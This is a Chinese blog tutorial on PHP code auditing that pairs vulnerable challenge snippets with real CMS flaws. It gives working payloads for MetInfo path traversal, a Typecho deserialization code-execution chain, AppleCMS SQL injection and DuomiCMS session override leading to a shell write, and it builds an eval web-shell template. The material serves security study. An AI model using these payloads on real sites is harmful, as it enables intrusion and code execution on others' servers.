accept函数_Php代码审计学习之函数缺陷(二)

最新推荐文章于 2022-10-06 20:44:57 发布
最新推荐文章于 2022-10-06 20:44:57 发布
阅读量332 收藏
点赞数
文章标签: accept函数 assert函数 php 字符串替换 php 模糊搜索替换间隔 phpinfo函数

str_replace函数过滤不当

Rabbit
  • code
class LanguageManager {  public function loadLanguage() {    $lang = $this->getBrowserLanguage();    $sanitizedLang = $this->sanitizeLanguage($lang);    require_once("/lang/$sanitizedLang");  }  private function getBrowserLanguage() {    $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? 'en';    return $lang;  }  private function sanitizeLanguage($language) {    return str_replace('../', '', $language);  }}(new LanguageManager())->loadLanguage();
  • str_replace(子字符串替换)
str_replace(字符串1,字符串2,字符串3):将字符串3中出现的所有字符串1换成字符串2。str_replace(数组1,字符串1,字符串2):将字符串2中出现的所有数组1中的值,换成字符串1。str_replace(数组1,数组2,字符串1):将字符串1中出现的所有数组1一一对应,替换成数组2的值,多余的替换成空字符串。
  • payload
....// 或者 ..././

Metinfo 6.0.0

  • strstr
查找字符串的首次出现到结尾的字符串
bb475e54749ddea5670bf6b2b467e1ea.png
漏洞分析
  • app/system/include/module/old_thumb.class.php:14
2fbd99648b7de6f8d351c0e80af3d4e1.png
  • include/thumb.php:6

全局搜索

e47aa379af275919b42a006491470f34.png
  • app/system/include/class/load.class.php:113
cb94cdc51a2244b187c955fe13532061.png
  • payload
http://localhost/metInfo/include/thumb.php?dir=.....///http/.....///最终用户授权许可协议.txt

程序未恰当exit导致的问题

Anticipation

  • code
extract($_POST);function goAway() {  error_log("Hacking attempt.");  header('Location: /error/');}if (!isset($pi) || !is_numeric($pi)) {  goAway();}if (!assert("(int)$pi == 3")) {  echo "This is not pi.";} else {  echo "This might be pi.";}
  • extract
从数组中将变量导入到当前的符号表
e24caaf1ce3e24316bbccebfb0addaa3.png
  • payload
pl=phpinfo()
  • 测试
69bcee0c94b8eeda2fb235c938af7c66.png

FengCms 1.32

  • install/index.php

如果安装完成会生成INSTALL文件,访问文件如果存在此文件则会弹窗提示退出,但没有及时exit,导致程序逻辑还是往下走,还是会安装

8f1c27a3670770d8715ddd25d7c58e90.png

Simple-Log1.6网站重装漏洞

  • install/index.php

访问文件如果存在此文件则会弹窗提示退出,但没有及时exit,只是跳转到首页,导致程序逻辑还是往下走,还是会安装

afdd9f56283b211e60aad1e275951854.png

unserialize反序列化漏洞

Pumpkin Pie

  • code
class Template {  public $cacheFile = '/tmp/cachefile';  public $template = '
Welcome back %s
'; public function __construct($data = null) { $data = $this->loadData($data); $this->render($data); } public function loadData($data) { if (substr($data, 0, 2) !== 'O:' && !preg_match('/O:d:/', $data)) { return unserialize($data); } return []; } public function createCache($file = null, $tpl = null) { $file = $file ?? $this->cacheFile; $tpl = $tpl ?? $this->template; file_put_contents($file, $tpl); } public function render($data) { echo sprintf( $this->template, htmlspecialchars($data['name']) ); } public function __destruct() { $this->createCache(); }}new Template($_COOKIE['data']);
  • 题解

在loadData函数中使用到了unserialize反序列化方法,对传进来的$data进行了反序列化,最后对Template进行了实例化,将COOKIE中的data进行了反序列化。

if (substr($data, 0, 2) !== 'O:'      && !preg_match('/O:d:/', $data))

代码对data进行了判断,不可以为对象,0:X,X不可以为数字,绕过方法可以使用array数组绕过第一个,在X前面加+绕过第二个限制,搭达到到达反序列化方法的步骤。在__destruct销毁时会调用createCache方法写入文件,达成目的。

  • payload
<?phpclass Template{    public $cacheFile = './test.php';    public $template = '<?php eval($_POST[xx])>';}$temp= new Template();$test = Array($temp);print(serialize($test));?>
  • 测试
a:1:{i:0;O:+8:"Template":2:{s:9:"cacheFile";s:10:"./test.php";s:8:"template";s:26:"";}}
8770cbe4cc59b834b89e1e24c4653d6e.png

Typecho-1.1

  • 环境搭建
68447546ae3970d31b5839572067420b.png
漏洞分析
  • install.php:230

将cookie中的_typechoconfigbase64解码之后进行反序列化操作

932f73e925023c50ec1a56635963226a.png
  • 条件

如果finish不存在,或者存在config.inc.php文件$_SESSION['typecho']为空,则退出程序

if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) {    exit;}
finish=1

将反序列化后的结果传递给$config

  • install.php:232
791a093ce75cd2b65117bbeda01ea126.png
  • var/Typecho/Db.php:114
35ee594e1af0a04682db206687745d50.png

变量adapterName = 'TypechoDbAdapter' . 变量adapterName,如果adapterName是对象,会触发_toString()方法

  • var/Typecho/Feed.php:223
6f5235594470760febc84a92a19f8b88.png
  • var/Typecho/Feed.php:290

如果$item['author']->screenName为私有属性或者不存在会触发__get方法

2653a5dc868d83c54bf5d2b763d6195a.png 
    public function __get($key)    {        return $this->get($key);    }
  • var/Typecho/Request.php:295
35055ba3c9294f26bc0a46cb41720f36.png

calluserfun回调函数,$this->param['scrrenName'] 的值设置为想要执行的函数,构造 $this->filter 为对应函数的参数值self::RSS2 == $this->type,type需要构造,item['author']为触发点,需要构造thisitems

  • 构造payload
<?phpclass Typecho_Request{    private $_params = array();    private $_fifter = array();    public function __construct(){        $this->_params['screenName'] = 'phpinfo()';        $this->_fifter[0] = 'assert';    }}class Typecho_Feed{    private $_type;    private $_item = array();    public function s__construct(){        $this->_type = 'RSS 2.0';        $item['author'] = new Typecho_Request();        $item['category']=Array(new Typecho_Request());        $this->_item[0]=$item;    }}$x = new Typecho_Feed();$a = array(    'adapter' => $x,    'prefix' => 'Typecho_');echo base64_encode(serialize($a));?>
0b1fa49a3a0a58df5d3182ddf7eda6da.png
  • 测试
e4da931fd58163cc4ff53c4742a693ac.png

误用htmlentities函数引发的漏洞

String Lights

  • code
$sanitized = [];foreach ($_GET as $key => $value) {  $sanitized[$key] = intval($value);}$queryParts = array_map(function ($key, $value) {  return $key . '=' . $value;}, array_keys($sanitized), array_values($sanitized));$query = implode('&', $queryParts);echo "link";
  • htmlentities
将字符转换为 HTML 转义字符

ENT_COMPAT(默认值):只转换双引号。 ENT_QUOTES:两种引号都转换。 ENT_NOQUOTES:两种引号都不转换。

  • 环境搭建
927dde546b0e9454800726527889d291.png
  • payload
a%27onclick%3Dalert%281%29%2f%2f=1

DM企业建站系统 v201710

漏洞分析
  • admindm-yourname/mod_common/login.php:63
9c7383be55add556c8e2c018a465e7e9.png
  • 直接拼接数据
 $ss_P="select * from ".TABLE_USER."  where  email='$user' and ps='$pscrypt'  order by id desc limit 1";
  • component/dm-config/global.common.php:421

ENT_NOQUOTES两种引号都不转换,造成注入

7fc157cf4d83cbf55761ff804480ae44.png

特定场合下addslashes函数的绕过

Turkey Baster

  • code
class LoginManager {  private $em;  private $user;  private $password;  public function __construct($user, $password) {    $this->em = DoctrineManager::getEntityManager();    $this->user = $user;    $this->password = $password;  }  public function isValid() {    $user = $this->sanitizeInput($this->user);    $pass = $this->sanitizeInput($this->password);    $queryBuilder = $this->em->createQueryBuilder()      ->select("COUNT(p)")      ->from("User", "u")      ->where("user = '$user' AND password = '$pass'");    $query = $queryBuilder->getQuery();    return boolval($query->getSingleScalarResult());  }  public function sanitizeInput($input, $length = 20) {    $input = addslashes($input);    if (strlen($input) > $length) {      $input = substr($input, 0, $length);    }    return $input;  }}$auth = new LoginManager($_POST['user'], $_POST['passwd']);if (!$auth->isValid()) {  exit;
  • 题解

实例化一个LoginManager类名,接收用户传递的user,passwd两个参数,并通过isValid方法判断是否合法,sanitizeInput方法,通过addslashes方法进行过滤,再截取20位返回。

  • addslashes
作用:在单引号(')、双引号(")、反斜线()与 NUL( NULL 字符)字符之前加上反斜线
  • substr
string substr ( string $string , int $start [, int $length ] )

返回字符串 string 由 start 和 length 参数指定的子字符串。

  • user
1234567890123456789'
  • sql
select count(p) from user where user = '1234567890123456789' AND password = 'or 1=1#'
  • payload
user=1234567890123456789'&passwd=or 1=1#

苹果CMS视频分享程序 8.0

  • 环境搭建
f588b4c969d4aeafd169a2af5cffc21f.png
漏洞分析
  • inc/common/template.php:754

$lp['wd']直接拼接SQL语句,造成SQL注入

57bf110f680d0a004520cab3bba1314a.png
  • inc/module/vod.php:96
600f4ff955e961f904542aeaf91f28fe.png
  • inc/common/function.php:266

对传进来的参数进行过滤

15649cd3dfec37fd0136c157261e5e03.png

在$res=isset($_REQUEST[$key]) ? $magicq ? $_REQUEST[$key] : @addslashes($_REQUEST[$key]) : '';中可以知道wd参数是通过REQUEST方法获取的然后进行过滤。

  • inc/common/360_safe3.php:27

跟踪chkSql函数

将传进来的参数进行urldecode解码之后,通过StopAttack方法,最后通过htmlEncode方法,最后返回。

212f144f9d0eb5e0eadb53a27413688d.png
  • inc/common/360_safe3.php:12

跟进StopAttack方法,使用preg_match方法进行过滤

2687ef96bb39813f451d41e1a85c9054.png
  • inc/common/360_safe3.php:57 跟踪$getfilter方法
a3509ba8c7b69518e225019b76f82d1f.png
  • inc/common/function.php:572

跟踪一下htmlEncode方法,针对 & 、 ' 、 空格 、 " 、 TAB 、 回车 、 换行 、 大于小于号 等符号进行实体编码转换

333dbec4de38cead769f3c4981b32257.png
  • inc/common/template.php:560
3817aa743052b881b5748841c954c50d.png
600f4ff955e961f904542aeaf91f28fe.png

而 wd 是可以从 REQUEST 中获取到,所以wd 实际上是可控的。

  • 漏洞思路

SQL注入点是字符型注入,htmlEncode方法实体编码了单引号,最后进行了url解码操作,可以通过双编码绕过,htmlEncode方法没有过滤反斜杠,而addslashes方法会过滤反斜杠。

  • 构造SQL
wd=))||if((select%0b(select(m_name)``from(mac_manager))regexp(0x5e61)),(`sleep`(3)),0)#%25%35%63

从变量覆盖到getshell

Snowman

  • code
class Carrot {  const EXTERNAL_DIRECTORY = '/tmp/';  private $id;  private $lost = 0;  private $bought = 0;  public function __construct($input) {    $this->id = rand(1, 1000);    foreach ($input as $field => $count) {      $this->$field = $count++;    }  }  public function __destruct() {    file_put_contents(      self::EXTERNAL_DIRECTORY . $this->id,      var_export(get_object_vars($this), true)    );  }}$carrot = new Carrot($_GET);
  • payload
id=shell.pho&shell=',)%0a//
  • 测试
ddb1ec36bbfafbb37b191898885148ae.png

DuomiCMS_3.0

  • 环境搭建
d980e14c8c2234b246d1a55c04e1c25f.png
漏洞分析
  • duomiphp/common.php:52

查看全局变量注册代码

foreach(Array('_GET','_POST','_COOKIE') as $_request){    foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);}
  • duomiphp/common.php:36

查看_RunMagicQuotes方法, _RunMagicQuotes 函数将特殊符号,使用 addslashes 函数进行转义处理

bebd43ca032fa580e6ec3eb6873b9106.png
  • admin/admin_ping.php:13

全剧追踪fwrite函数,$weburl与token来源于post,可控。

77be74c50d28028f6dc3839dafeef353.png

weburl 变量和 token 变量从 POST方式获取,经过了_RunMagicQuotes方法还有webscan.php的过滤,但是可以写shell

adminadmin_ping.php文件得需要admin身份才可以有访问权限写shell

  • admin/config.php:28
f79dd4512595b8543136be5c539dfb5e.png
  • duomiphp/check.admin.php:41
acb48b013d48bdf33d8849afd2d4a331.png
  • admin/login.php:62
2fb89989248f88386d3f740b8f21f99e.png
  • duomiphp/check.admin.php:72

跟进checkUser方法

e7ae1020c5d7ed6198f2be2b19701b9c.png
cb7476930d2869e8917bfa196c643c22.png
  • 登陆管理用户查看组

可知用户组和userid均为1

432ea5e8b8d6756a5fec2581b728429b.png
  • 覆盖 session 的值

重点注意这里git项目上的覆盖session有问题,可以使用这个payload

member/share.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1
  • payload
Host: www.test.com:8888Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 34weburl=";phpinfo();//&token=
  • 测试
8dd686c4d4305a9b01d70798cd4a08d0.png

$SERVER['PHPSELF']导致的防御失效问题

Sleigh Ride

  • code
class Redirect {  private $websiteHost = 'www.example.com';  private function setHeaders($url) {    $url = urldecode($url);    header("Location: $url");  }  public function startRedirect($params) {    $parts = explode('/', $_SERVER['PHP_SELF']);    $baseFile = end($parts);    $url = sprintf(      "%s?%s",      $baseFile,      http_build_query($params)    );    $this->setHeaders($url);  }}if ($_GET['redirect']) {  (new Redirect())->startRedirect($_GET['params']);}
  • 环境搭建
a0957ab804d7468abc43afd8247f1481.png
  • 题解

代码实现的功能实则为一个URL跳转的功能,PHP_SELF 指当前的页面绝对地址。

  • payload
/index.php/http:%252f%252fwww.syst1m.com?redirect=1
  • 测试

跳转到了我的博客

57f26724231fe51881d4ba162718abf8.png

深入理解$_REQUESTS数组

Poem

  • code
class FTP {  public $sock;  public function __construct($host, $port, $user, $pass) {    $this->sock = fsockopen($host, $port);    $this->login($user, $pass);    $this->cleanInput();    $this->mode($_REQUEST['mode']);    $this->send($_FILES['file']);  }  private function cleanInput() {    $_GET = array_map('intval', $_GET);    $_POST = array_map('intval', $_POST);    $_COOKIE = array_map('intval', $_COOKIE);  }  public function login($username, $password) {    fwrite($this->sock, "USER " . $username . "");    fwrite($this->sock, "PASS " . $password . "");  }  public function mode($mode) {    if ($mode == 1 || $mode == 2 || $mode == 3) {      fputs($this->sock, "MODE $mode");    }  }  public function send($data) {    fputs($this->sock, $data);  }}new FTP('localhost', 21, 'user', 'password');
  • 题解

mode是通过request传进来的,在cleanInput方法中将get、post、cookie传进来的全部通过intval函数过滤

  • REQUEST
782299cd5c923f2c116e42fb678d4e69.png
  • payload
?mode=1%0a%0dDELETE%20test.file

Raw MD5 Hash引发的注入

Turkey Baster

  • code
class RealSecureLoginManager {  private $em;  private $user;  private $password;  public function __construct($user, $password) {    $this->em = DoctrineManager::getEntityManager();    $this->user = $user;    $this->password = $password;  }  public function isValid() {    $pass = md5($this->password, true);    $user = $this->sanitizeInput($this->user);    $queryBuilder = $this->em->createQueryBuilder()      ->select("COUNT(p)")      ->from("User", "u")      ->where("password = '$pass' AND user = '$user'");    $query = $queryBuilder->getQuery();    return boolval($query->getSingleScalarResult());  }  public function sanitizeInput($input) {    return addslashes($input);  }  $c = new RealSecureLoginManager(  $_POST['user'],  $_POST['passwd']);if (!$auth->isValid()) {  exit;}
  • md5(计算字符串的 MD5 散列值)
string md5 ( string $str [, bool $raw_output = false ] )
  • 题解

auth新建了一个RealSecureLoginManager对象,传进去POST的user和passwd。在md5方法中,如果可选的 raw_output 被设置为 TRUE,那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。

  • fuzz
fdbc46198df95425a241300a8ceb475d.png
  • payload
user= OR 1=1#&passwd=128
  • SQL
select count(p) from user s where password='v�a�n���l���q��' and user=' OR 1=1#'

实例分析

  • 题目地址
http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php

分析

  • 查看源代码
a35e5a8d5edbac306c40e786e931f9cd.png
  • password
md5($password,true)
  • payload
password=ffifdyop或者129581926211651571912466741651878684928
  • 测试
a21013c5c6aae8188c904a9096ce83be.png
weixin_39703561
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Typecho-CMS反序列化任意代码执行漏洞分析和复现
weixin_43058307的博客
08-10 596
Typecho-CMS反序列化 代码审计 漏洞的入口出现在install.php //判断是否已经安装 if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) { exit; } // 挡掉可能的跨站请求 if (!empty($_GET) || !empty($_POST)) {
使用php判断浏览器的类型和语言的函数代码
01-21
我们经常看到有一些网站上面会显示出你目前使用的浏览器类型和使用的语言,比如显示的是:您使用的浏览器为 ...php echo $_SERVER[“HTTP_ACCEPT_LANGUAGE”]; ?> 判断浏览器类型的具体程序如下:复制代码 代码如下:
WEB攻防-PHP特性&缺陷对比函数&CTF考点
m0_65336233的博客
10-06 1507
WEB攻防-PHP特性&缺陷对比函数&CTF考点
substr函数
weixin_33699914的博客
02-08 86
定义和用法substr() 函数返回字符串的一部分语法substr(string,start,length)参数解析参数描述string必需。规定要返回其中一部分的字符串。start必需。规定在字符串的何处开始。正数 - 在字符串的指定位置开始负数 - 在从字符串结尾开始的指定位置开始0 - 在字符串中的第一个字符处开始length可选。规定被返回字符串的长度。默认是直到字符...
php isset 数组 键的一个坑
walle的博客
05-08 687
有个数组$arr, $arr['key'] = 5; isset($arr['key'])是true 如果$arr['key'] = 0; isset($arr['key'])也是true 如果$arr['key'] = null; isset($arr['key'])就是false了 应该用array_key_exist('key', $arr)来判断 ...
isset php 维数组_浅析PHP反序列化漏洞
weixin_39982580的博客
12-28 321
0x01 前言很久没有些文章了,今天复习了反序列化漏洞的知识,顺便写了一篇文章。0x02 PHP序列化和反序列化基础我们想要将数组值存储到数据库时,就可以对数组进行序列化操作,然后将序列化后的值存储到数据库中。其实PHP序列化数组就是将复杂的数组数据类型转换为字符串,方便数组存库操作。对PHP数组进行序列化和反序列化操作,主要就用到两个函数,serialize和unserialize。PHP序列化...
windows_API.rar_API_API 函数_API函数_windows api
09-20
此外,“www.pudn.com.txt”可能是一个链接或者引用了pudn.com网站上的额外资源,该网站是一个知名的编程资源分享平台,可能会提供更多的API函数学习材料、示例代码或相关讨论。 总的来说,这个压缩包是Windows API...
win api.zip_API_API函数_WIN API_windows api
09-24
9. **网络通信**:WSAStartup、socket、bind、listen、accept、recv、send等函数属于Winsock库,用于实现网络通信。 10. **设备访问**:CreateFile、DeviceIoControl等函数可以用来与硬件设备交互,如打印机、硬盘...
API函数详细说明库.rar_API_Windows API函数 _windows api
09-23
在IT领域,Windows API(应用程序接口)是开发者与操作系统交互的核心工具。...通过“API函数详细说明库”,开发者可以深入理解每个函数的工作原理,并将其应用于实际项目中,提升开发效率和代码质量。
php中get_headers函数的作用及用法的详细介绍
12-19
以下是一个简单的代码示例,展示了如何使用`get_headers()`函数: ```php <?php $url = 'http://www.phpernote.com'; $headers1 = get_headers($url); $headers2 = get_headers($url, 1); print_r($headers1); ...
文件包含漏洞&认识认识
weixin_54882883的博客
05-25 157
文件包含 概念 什么时候文件包含 那么文件包含呢简单来说就是 你的大哥,你有六个小弟, 那么大哥就有这六个小弟的呼叫方式, 当他要那个小弟的帮助就直接呼叫那个小弟那个小弟就会过滤帮助他了 那么用专业的话来说就是, 有ABCD四个文件 那么A文件里面设置了文件包含的函数 那么当A文件需要B文件的时候,就包含B文件就可以了,当A文件需要C文件就包含C文件就可以了, 可以怎么去简单理解 那么程序员为什么会用到文件包含呢 首先就是一个方便,当A文件需要B文件的时候就直接通过文件包含,包含B文件就可以,直接把B
PHP反序列化漏洞总结
坚持硬核
10-07 1万+
一、什么是序列化? 将php中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中。而反序列化就是将这个过程倒过来。 当在php中创建了一个对象后,可以通过serialize()把这个对象变成一个字符串,保存对象的值方便以后传递使用。 <?php class A{ public $test = 123; } $a = new A; $a_ser=ser...
web渗透中bypass防护系统
Shanfenglan's blog
01-25 2964
文章目录1. webshell执行命令2. sql注入2.1 安全狗mssqlmysql2.2 云盾mysql2.3 云锁mysqlfastjsonsafeline参考文章 1. webshell执行命令 文件上传后向webshell传参数: 三重url编码 三重base64编码 cookie传参 参数污染 http://test/xx.jsp?a=xxx很多的垃圾字符xxx&cmd=whoami cookie传参对应webshell: x=ls <?php $p=$_COOKI
PHP 数组元素值为NULL 与isset的坑
过客阵营 -- 简单的就要最简单
05-15 620
定义一个PHP 数组 $arr = array('jjbao'=&gt;null,'cnima'=&gt;null); isset($arr['jjbao']) 竟然返回的false把 null 改成 0 就没有问题了 找了半个小时 蛋痛啊 解决方法: isset() 对于数组中为 NULL 的值不会返回 TRUE,而 array_key_exists() 会。   ...
php字符串当数组使用isset的问题
u014433030的专栏
07-27 493
$val = 'abcd'; if(isset($val['grp'][0])) { echo '1111'; } if(isset($val['grp'][1])) { echo '2222'; } 输出:1111 很奇怪吧,如果直接打印呢? var_dump($val['grp'][0]);输出:string 'a' (length=1) 当然开了调试模
Python 检查数组元素是否存在 类PHP isset()
热门推荐
陈小峰(iefreer)的专栏
10-11 1万+
PHP中有isset方法来检查数组元素是否存在,在Python中无对应函数
php isset 和 array_key_exists 检查数组中是否存在某值的区别
ivhong
03-25 2123
原文地址:http://ivhong.com/?p=110 http://ivhong.com/?p=110(ivhong.com 是我的博客主址) 先看看下面这段代码,你觉得结果是什么呢? //定义一个数组, > 5.4 $arr = ['a' => null]; var_dump(isset($arr), array_key_exists('a', $arr));
PHP函数中isset和array_key_exists的差异
稻草人技术博客
03-01 1131
在判断某个 PHP 数组的索引值是否存在,一般会使用 isset 和 array_key_exists 两种方法。isset($a['key']) array_key_exists('key', $a)array_key_exists 确切地告诉你,数组是否存在某个键,而 isset 则只是返回键值是否为 null 的状态。也就是说,假设给定下面的数组:$a = array('key1' => '1
深入理解PHP之isset和array_key_exists对比
weixin_34236869的博客
10-08 444
1、概述 经常使用isset判断变量或数组中的键是否存在, 但是数组中可以使用array_key_exists这个函数, 那么这两个谁最优呢? 官方文档对两者的定义 - 分类 描述 文档 isset 语言构造器 检测变量是否已设置并且非 NULL php.net/manual/zh/f… array_key_exists 函数 检查数组里是否有指定的键名或索引 php.net/m...
如何调用accept()函数代码
最新发布
03-12
调用accept()函数的代码如下: ``` #include #include int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); ``` 其中,sockfd是已经调用过bind()和listen()函数的socket文件描述符;addr是一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值